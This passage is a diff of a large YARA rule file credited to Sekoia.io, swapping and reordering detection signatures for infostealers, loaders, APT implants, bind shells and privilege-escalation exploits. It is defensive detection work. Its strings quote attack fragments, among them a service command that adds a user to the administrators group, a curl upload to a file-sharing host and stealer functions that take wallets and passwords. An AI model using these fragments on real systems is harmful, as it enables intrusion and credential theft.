+		$str03 = "main.extracttasksch" ascii
+		$str04 = "main.BrowserDownloadsViewExtract" ascii
+		$str05 = "main.stealmetamask" ascii
+		$str06 = "main.stealexoduswallet" ascii
+		$str07 = "main.moveatomic" ascii
+		$str08 = "main.movefirefoxcookies" ascii
+		$str09 = "main.movepasswords" ascii
+		$str10 = "main.FinallyZIPIPFolder" ascii
+		$str11 = "edgeguard.business" ascii
+		$str12 = "/License.XenArmor" ascii
+		$str13 = "/TaskSchedulerView.exe" ascii
+		$str14 = "/BrowsingHistoryView.exe" ascii
+		$str15 = "/outlookfiles/starter.exe" ascii
+		$str16 = "/outlookfiles/External.zip" ascii
+		$str17 = "/outlookfiles/XenManager.dll" ascii
+		$str18 = "/outlookfiles/EmailPasswordRecoveryPro.exe" ascii
 
 	condition:
-		$s1 and $s2 and ( $s4 in ( @s3 .. @s3 + 100 ) or $s5 in ( @s3 .. @s3 + 100 ) ) and filesize < 2000
+		uint16( 0 ) == 0x5a4d and 10 of ( $str* )
 }
-rule SEKOIA_Tool_Exploit_Badpotato_Strings : FILE
+rule SEKOIA_Infostealer_Win_Lumma_Strings_Aug23 : FILE
 {
 	meta:
-		description = "Detects BadPotato compiled exploit"
+		description = "Finds Lumma samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "079aabbc-6978-4d71-92d2-d2a7ce1cc915"
-		date = "2022-09-09"
+		id = "728f7825-a463-4b19-b2d3-3460e4c06dc9"
+		date = "2023-09-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_exploit_badpotato_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a45935ea5877a4b81468cbe0e1a4a7232b955771442f84bb3b88b7992ed23937"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_lumma_strings_aug23.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "704a31b0f7c30602305768f13bf6108ebaf08c62451833731d2f2f020efce386"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228847,28 +229471,31 @@ rule SEKOIA_Tool_Exploit_Badpotato_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "RpcStringBindingCompose failed with status 0x" wide
-		$ = "RpcBindingFromStringBinding failed with status 0x" wide
-		$ = "RpcBindingSetAuthInfoEx failed with status 0x" wide
-		$ = "RpcBindingSetOption failed with status 0x" wide
-		$ = "\\\\.\\pipe\\{0}\\pipe\\spoolss" wide
-		$ = "[*] {0} Success! ProcessPid:{1}" wide
+		$str01 = "lid=%s&j=%s&ver" ascii
+		$str02 = "%s (%d.%d.%d)" ascii
+		$str03 = "- Screen Resoluton:" ascii
+		$str04 = "- Physical Installed Memory:" ascii
+		$str05 = "Content-Type: attachment/x-object" ascii
+		$str06 = "Content-Type: application/x-www-form-urlencoded" ascii
+		$str07 = "Content-Type: multipart/form-data; boundary=%s" wide
+		$str08 = "SysmonDrv" wide
+		$str09 = "TeslaBrowser/5.5" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Loader_Win_Gcleaner : FILE
+rule SEKOIA_Apt_Oilrig_Sc5Kv3_Strings : FILE
 {
 	meta:
-		description = "Detect the GCleaner loader using specific strings"
+		description = "Detects SC5kv3 malware based on strings"
 		author = "Sekoia.io"
-		id = "0c085da3-ec77-4141-a927-bef1578a6dee"
-		date = "2022-10-11"
+		id = "885ea13b-47b0-4a6d-8136-9b31abc9064a"
+		date = "2023-12-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_gcleaner.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f38aaab2911e4e901780bb6df2c58f02fa80d3e39fb56f60072285d0a929ba23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_sc5kv3_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ace8e227abd97d0ec21815cc58c24d46e4944f2b0e1987672be53f81356a7a57"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228876,31 +229503,24 @@ rule SEKOIA_Loader_Win_Gcleaner : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "G-Cleaner can clean unneeded files, settings, and Registry entries" ascii
-		$str02 = "3.  Click \"Run G-Cleaner\"" ascii
-		$str03 = "Garbage_Cleaner" ascii
-		$str04 = "GCleaner.Properties" ascii
-		$str05 = "SOFTWARE\\GCleaner\\Install" wide
-		$str06 = "SOFTWARE\\GCleaner\\Trial" wide
-		$str07 = "SOFTWARE\\GCleaner\\License" wide
-		$str08 = "G-Cleaner activation" wide
+		$ = "no-reply this email!" ascii wide
+		$ = "The serial is " ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
 }
-
-rule SEKOIA_Crybercrime_Prophetspider_Proxy : FILE
+rule SEKOIA_Apt_Rusticweb_Stealer : FILE
 {
 	meta:
-		description = "Detects the Winntaa decryption loop or imphash"
+		description = "Detects stealer used by RusticWeb"
 		author = "Sekoia.io"
-		id = "b7637fc3-bf81-40c4-869c-1c283574e0a7"
-		date = "2022-02-17"
+		id = "813072e0-28de-4cb7-b2cc-71d77a1e8508"
+		date = "2024-01-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crybercrime_prophetspider_proxy.yar#L3-L41"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "711ef3fc6ac488200415b7178c7f639ad9f6c72077bbebac2e6d5e0bed7120dd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_rusticweb_stealer.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "68f802ef442e68cbcca789eae2bb8a4395af86699320e5a8101c07469e7555fb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228908,46 +229528,27 @@ rule SEKOIA_Crybercrime_Prophetspider_Proxy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 56
-        57
-        48 8D 95 F0 FE FF FF
-        31 C0
-        66 21 02
-        48 89 CE
-        AC
-        48 89 D7
-        4C 89 C2
-        88 D4
-        30 C2
-        0F B6 CA
-        48 89 95 E8 FE FF FF
-        AC
-        30 E0
-        AA
-        E2 FA
-        88 C8
-        AA
-        48 8D 85 F0 FE FF FF
-        48 8B 95 E8 FE FF FF
-        5F
-        5E
-        C3 }
+		$s1 = "-FTT=@"
+		$s2 = "https://oshi.at"
+		$s3 = "curl-T"
+		$s4 = "upload/upload.php"
+		$s5 = "cargo"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( all of them or pe.imphash ( ) == "55e0b8e5b4d787c680ada4e450789a4d" )
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 3 of them
 }
-rule SEKOIA_Luckymouse_Sysupdate_Payload : FILE
+rule SEKOIA_Apt_Mustangpanda_Malicious_Lnk_Worm : FILE
 {
 	meta:
-		description = "Detects decryption routine prologue of sysupdate samples"
+		description = "Detects MustangPanda infected ThumbDrive"
 		author = "Sekoia.io"
-		id = "97df4700-de35-49a0-869e-ed89a6d9cbdd"
-		date = "2022-08-19"
+		id = "e7cc5ecc-2369-49ff-9e35-c9faeb69acda"
+		date = "2023-09-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/luckymouse_sysupdate_payload.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e8501a50c65330153e613ae5bd6bbfbe4372d85175c3ed81d202ec5f177a94be"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_malicious_lnk_worm.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ca19a925af695cbbb41fdfbb161dceafeb8aae6d42000cc09bb07e1dbdfdb9e5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228955,25 +229556,23 @@ rule SEKOIA_Luckymouse_Sysupdate_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { DB ?? ?? C9 66 B9 ?? ?? E8 FF FF FF FF }
+		$s1 = "RECYCLER.BIN\\1\\CEFHelper.exe" wide
 
 	condition:
-		filesize < 1MB and all of them
+		uint32be( 0 ) == 0x4C000000 and 1 of them
 }
-rule SEKOIA_Apt_Apt28_Ukrnet_Phishing_Page : FILE
+rule SEKOIA_Apt_Tealkurma_Snappytcp_Strings : FILE
 {
 	meta:
-		description = "Detects APT28 Phishing page"
+		description = "Detects TealKurma SnappyTCP shell script"
 		author = "Sekoia.io"
-		id = "053158d8-aac0-486f-8432-834a06f41ed2"
-		date = "2024-09-02"
+		id = "6bbee6d6-f490-4550-bd61-a643f93a8788"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_ukrnet_phishing_page.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "20dc3a5beb8e3a7801e010b4113efef1"
-		hash = "5f1462144d7704101cd71c679ea0322b"
-		logic_hash = "3d077a7ce35094bcbda763c131d4564ffbcea0373f5cbd30406ada4e9db36529"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_tealkurma_snappytcp_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b91adef3332850d952cace104fc05e1b09e6175a27ae991905defc46de608e88"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228981,96 +229580,82 @@ rule SEKOIA_Apt_Apt28_Ukrnet_Phishing_Page : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "baseurl+\"/captcha\""
-		$ = "(\"sessionID\", sessionID"
-		$ = ".responseJSON['origin"
-		$ = "var baseurl="
-		$ = "(req.responseText.includes("
-		$ = "else if (req.responseText=='FAIL')"
-		$ = "|| document.getElementById('confpwd"
-		$ = "/master/dist/text-security-disc.woff"
+		$s1 = "#!/bin/bash" ascii
+		$s2 = "2>&1>/dev/null&" ascii
+		$s3 = "PATH=$PATH:$PWD;" ascii
 
 	condition:
-		4 of them and filesize < 500KB
+		$s1 at 0 and $s2 at filesize -16 and $s3 and filesize < 300
 }
-
-rule SEKOIA_Implant_Win_Sliver_Dll : FILE
+rule SEKOIA_Unknown_7777_Xlogin : FILE
 {
 	meta:
-		description = "Detect the Sliver DLL based on export names (standalone and process/memory dumps)"
+		description = "Detects the xlogin bind shell and its variants"
 		author = "Sekoia.io"
-		id = "41d83011-a08b-4245-b633-79fe6afaa4d2"
-		date = "2021-11-08"
+		id = "ce0beffc-f957-43ef-a739-f4a1099a7a67"
+		date = "2024-07-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_sliver_dll.yar#L3-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "251a123fe70338d18c9bc9fb9e0b0d542f2b94203bee8537244e62fa102f371b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/unknown_7777_xlogin.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "4d9067e7cf517158337123a30a9bd0e3"
+		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
+		hash = "777d6f907da38365924a0c2a12e973c5"
+		hash = "8542a3cbe232fe78baa0882736c61926"
+		logic_hash = "1c38d8019734affdebac32050097bbcf89e9069fb2145a976588eca04ecc78df"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		modification_date = "2021-12-22"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "main.RunSliver"
-		$a2 = "main.DllInstall"
+		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
+		$string2 = { 2F 64 65 76 2F 6E 75 6C 6C [1-3] 2F 62 69 6E 2F 73 68 00 2D 63 }
 
 	condition:
-		( filesize > 8MB and filesize < 11MB and uint16be( 0 ) == 0x4d5a and pe.characteristics & pe.DLL and pe.exports ( "RunSliver" ) and pe.exports ( "DllInstall" ) and pe.exports ( "VoidFunc" ) ) or ( true and ( uint32be( 0 ) == 0x4d444d50 or uint32be( 0 ) == 0x00000000 ) and $a2 in ( @a1 .. @a1 + 100 ) )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and ( ( @string2 - @string1 < 3400 ) )
 }
-rule SEKOIA_Infostealer_Mac_Realst : FILE
+rule SEKOIA_Tool_Exploit_Comahawk_Strings : FILE
 {
 	meta:
-		description = "Finds Realst Stealer samples based on specific strings"
+		description = "Detects COMahawk exploit compiled binaries"
 		author = "Sekoia.io"
-		id = "16a89317-c92d-4e13-94d3-a85a915f52e5"
-		date = "2023-09-11"
+		id = "cc0d10ae-1a14-48c1-9c45-d65fac15f8f1"
+		date = "2022-09-09"
 		modified = "2024-12-19"
-		reference = "https://iamdeadlyz.gitbook.io/malware-research/july-2023/fake-blockchain-games-deliver-redline-stealer-and-realst-stealer-a-new-macos-infostealer-malware#realst-stealer-macos"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_mac_realst.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "72e694e5c32cbaeb7dff7913fde671619e2c8d892e552546dd1682e38f6804c5"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_exploit_comahawk_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a80fed3fd64562dd3e2fa197ca3d2aaf8e33783729b725c71f7eb8931af70d82"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "realst@" ascii
-		$str01 = "IP:" ascii
-		$str02 = "OS:" ascii
-		$str03 = "PC PASSWORD:" ascii
-		$str04 = "Cookies:" ascii
-		$str05 = "Wallets:" ascii
-		$str06 = "Apps:" ascii
-		$str07 = "USERNAME: ]" ascii
-		$str08 = "FILENAME:" ascii
-		$str09 = "multipart/form-data; boundary=" ascii
-		$str10 = "src/browsers/firefox/modules/decryptors.rs" ascii
-		$str11 = "{\"event_id\":\"" ascii
-		$str12 = "..browsers..firefox..modules..data_stealers.." ascii
-		$str13 = "..browsers..chromium..modules..key_stealers.." ascii
-		$str14 = "..browsers..firefox..modules..decryptors.." ascii
-		$str15 = "url: , login: , password:" ascii
+		$ = "sc config UsoSvc binpath=" wide
+		$ = "binpath= \"cmd.exe /c net localgroup administrators /add"
+		$ = "[+] Command executed."
+		$ = "Release\\COMahawk.pdb"
+		$ = " is added as an admin."
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and 13 of ( $str* )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Exploit_Linux_Eop_Dirtypipe_Strings : FILE
+rule SEKOIA_Tool_Sharphoundpowershell_Strings : FILE
 {
 	meta:
-		description = "Detects DirtyPipe Local Privesc exploit"
+		description = "Detects SharpHound Powershell"
 		author = "Sekoia.io"
-		id = "712d8a01-576e-4f43-a930-63dcdc535d93"
-		date = "2023-12-08"
+		id = "f27a0bdc-1a8c-43f9-843c-6c8506726f37"
+		date = "2022-08-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_dirtypipe_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0abb8de541acea57ced20f66c0aad7b010fea647996039809d36e94555dee204"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_sharphoundpowershell_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "29756acb0afd8aabac170ca8288f1dcffcb2e601c9bdba1cc7a30b8b415661f6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229078,26 +229663,28 @@ rule SEKOIA_Exploit_Linux_Eop_Dirtypipe_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] hijacking suid binary.."
-		$ = "[+] dropping suid shell.."
-		$ = "[+] restoring suid binary.."
-		$ = "[+] popping root shell.."
+		$ = "function Invoke-BloodHound"
+		$ = "$vars.Add($RealDNSName)"
+		$ = "$vars.Add($Jitter)"
+		$ = "CmdletBinding(PositionalBinding = $false)"
+		$ = ").Invoke($Null, @(,$passed))"
+		$ = "$EncodedCompressedFile ="
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		filesize < 2MB and 4 of them
 }
-rule SEKOIA_Hacktool_Pplblade_Strings : FILE
+rule SEKOIA_Apt_3Cx_Payload_Stealer : FILE
 {
 	meta:
-		description = "Detects PPLBlade"
+		description = "Detects stealer used in 3CX campaign"
 		author = "Sekoia.io"
-		id = "1a443621-fc95-4a70-873e-c1389943d4ab"
-		date = "2023-11-23"
+		id = "1ca0605d-101f-4d1d-a476-9dfd93e74b4c"
+		date = "2023-03-31"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_pplblade_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e853e109dbf5dfcba465f61cb689f261df5156e98297d3d00f700e20491de66e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_3cx_payload_stealer.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "17630ab86a3da3408e29765c0c30f14c76b870b88fea634b998392fe5d46cfa2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229105,26 +229692,26 @@ rule SEKOIA_Hacktool_Pplblade_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "shirou/gopsutil/internal/"
-		$ = ".miniDumpWriteDump"
-		$ = ".DRIVER_FULL_PATH"
+		$s1 = "******************************** %s ******************************" wide
+		$s2 = "\\3CXDesktopApp\\config.json" wide
+		$s3 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\":" wide
+		$s4 = "%s.old" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 4MB and filesize < 6MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-
-rule SEKOIA_Loader_Win_Svcready_Imports : FILE
+rule SEKOIA_Loader_Win_Aresloader : FILE
 {
 	meta:
-		description = "Finds samples of the SVCReady loader"
+		description = "Finds AresLoader samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "e89aa736-acee-4881-b367-a9abfe9784ec"
-		date = "2022-06-08"
+		id = "bf5070fc-c8ca-4458-8702-cd1830667b7a"
+		date = "2023-05-02"
 		modified = "2024-12-19"
-		reference = "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_svcready_imports.yar#L3-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f210c5363d19dbc822b8476f8ecfd86184af8f1c36819a6c868f171152e7cb74"
+		reference = "https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_aresloader.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2edbb625394506e865580373d5c3454b4fa201183c84d247b4373f24e25f5fd4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229132,24 +229719,35 @@ rule SEKOIA_Loader_Win_Svcready_Imports : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Svc:RunPEDllNative" ascii
-		$str1 = "RunPEDllNative::" ascii
+		$str01 = "{\\\"ip\\\": '%s', \\\"UID\\\": '%s', \\\"geo\\\": '%s', \\\"service\\\": '%s', \\\"owner_token\\\": '%s'}" ascii
+		$str02 = "AresLdr_v_3" ascii
+		$str03 = "https://ipinfo.io/ip" ascii
+		$str04 = "C:\\Users\\%s\\AppData\\Roaming\\%s\\%s" ascii
+		$str05 = "/manager/payload" ascii
+		$str06 = "/manager/loader" ascii
+		$str07 = "/manager/legit" ascii
+		$str08 = "/manager/hvnc" ascii
+		$str09 = "C%p %d V=%0X w=%ld %s" ascii
+		$str10 = "rundll32.exe %s,%s" ascii
+		$str11 = "%startinfo" ascii
+		$str12 = "%managedapp" ascii
+		$str13 = "%has_cctor" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 200KB and filesize < 2MB and pe.imports ( "GDI32.dll" , "Ellipse" ) and pe.imports ( "GDI32.dll" , "SelectObject" ) and pe.imports ( "GDI32.dll" , "GetStockObject" ) and pe.imports ( "GDI32.dll" ) == 3 and all of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Rat_Win_Babylon : FILE
+rule SEKOIA_Tool_Scanline_Strings : FILE
 {
 	meta:
-		description = "Finds Babylon RAT samples based on specific strings"
+		description = "Detects scanline (non-packed)"
 		author = "Sekoia.io"
-		id = "ba9ab80a-ad7e-4746-aff2-9328440cbb25"
-		date = "2023-08-22"
+		id = "65677b81-d077-4d01-8398-cbb06ce49edf"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_babylon.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "142f10e519561d6552c9cb8d267280b9ede203a2f4723d904ab07217b0565bd1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_scanline_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e02ae30451aa5eaffb588e92ecc221bf6ed07097bc493c6a55cf688da8b76151"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229157,63 +229755,54 @@ rule SEKOIA_Rat_Win_Babylon : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "ParadoxRAT_Client" ascii
-		$str02 = "*** in database %s ***" ascii
-		$str03 = "\\drivers\\etc\\HOSTS" ascii
-		$str04 = "Babylon RAT Client" wide
-		$str05 = "ClipBoard.txt" wide
-		$str06 = "a,ccs=UTF-16LE" wide
-		$str07 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" wide
-		$str08 = "Update Failed [OpenProcess]..." wide
-		$str09 = "DoS Already Active..." wide
-		$str10 = "File Download and Execution Failed..." wide
-		$str11 = "LgDError33x98dGetProcAddress" wide
-		$str12 = "FriendlyName" wide
-		$str13 = "@SPYNET" wide
+		$ = "Resolve IP addresses to hostnames"
+		$ = "Randomize IP and port scan order"
+		$ = "?bhijnprsT"
+		$ = "sl -bht"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of ( $str* )
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Downloader_Mac_Rustbucket_Swiftloader
+rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_1 : FILE
 {
 	meta:
-		description = "Detect the file com.EdoneViewer in the new version of RustBucker 2023-10"
+		description = "UAC-0154 Infection chain"
 		author = "Sekoia.io"
-		id = "bdbc95db-5d58-4c96-91f9-34b653e67f50"
-		date = "2023-12-05"
+		id = "428eb021-b37f-4db5-8cab-ca2f6dd2e202"
+		date = "2023-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_rustbucket_swiftloader.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "acb5b88f8af53cd3d83de0fd6c3049ce017f038dc7c8b31f70e65e60bf713dfb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_uac0154_powershell_infection_chain_1.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a849c397e7f61e41ea7e67a265717d7d66f6af42f3d1e930020d1433dd3aab18"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "7c5bf60787bfd076c8806eaa4f1185f5b9fda69008376624ab3d17f207eb16a4"
-		hash2 = "bc90adde92bd47b4de7d384e5b20c1a1791d603629bd0fcba4b550fb35e93216"
-		hash3 = "c9a7b42c7b29ca948160f95f017e9e9ae781f3b981ecf6edbac943e52c63ffc8"
 
 	strings:
-		$ = "/Users/ghost/Desktop/EdoneViewer/EdoneViewer/"
-		$ = "EdoneViewerApp.swift"
+		$ = "command $es ="
+		$ = "function isV"
+		$ = "doIn;"
+		$ = "System.IO.Comp"
 
 	condition:
-		1 of them
+		all of them and filesize < 100KB
 }
-rule SEKOIA_Infostealer_Win_Lumma_Strings_Aug23 : FILE
+
+rule SEKOIA_Crybercrime_Prophetspider_Proxy : FILE
 {
 	meta:
-		description = "Finds Lumma samples based on the specific strings"
+		description = "Detects the Winntaa decryption loop or imphash"
 		author = "Sekoia.io"
-		id = "728f7825-a463-4b19-b2d3-3460e4c06dc9"
-		date = "2023-09-14"
+		id = "b7637fc3-bf81-40c4-869c-1c283574e0a7"
+		date = "2022-02-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_lumma_strings_aug23.yar#L1-L23"
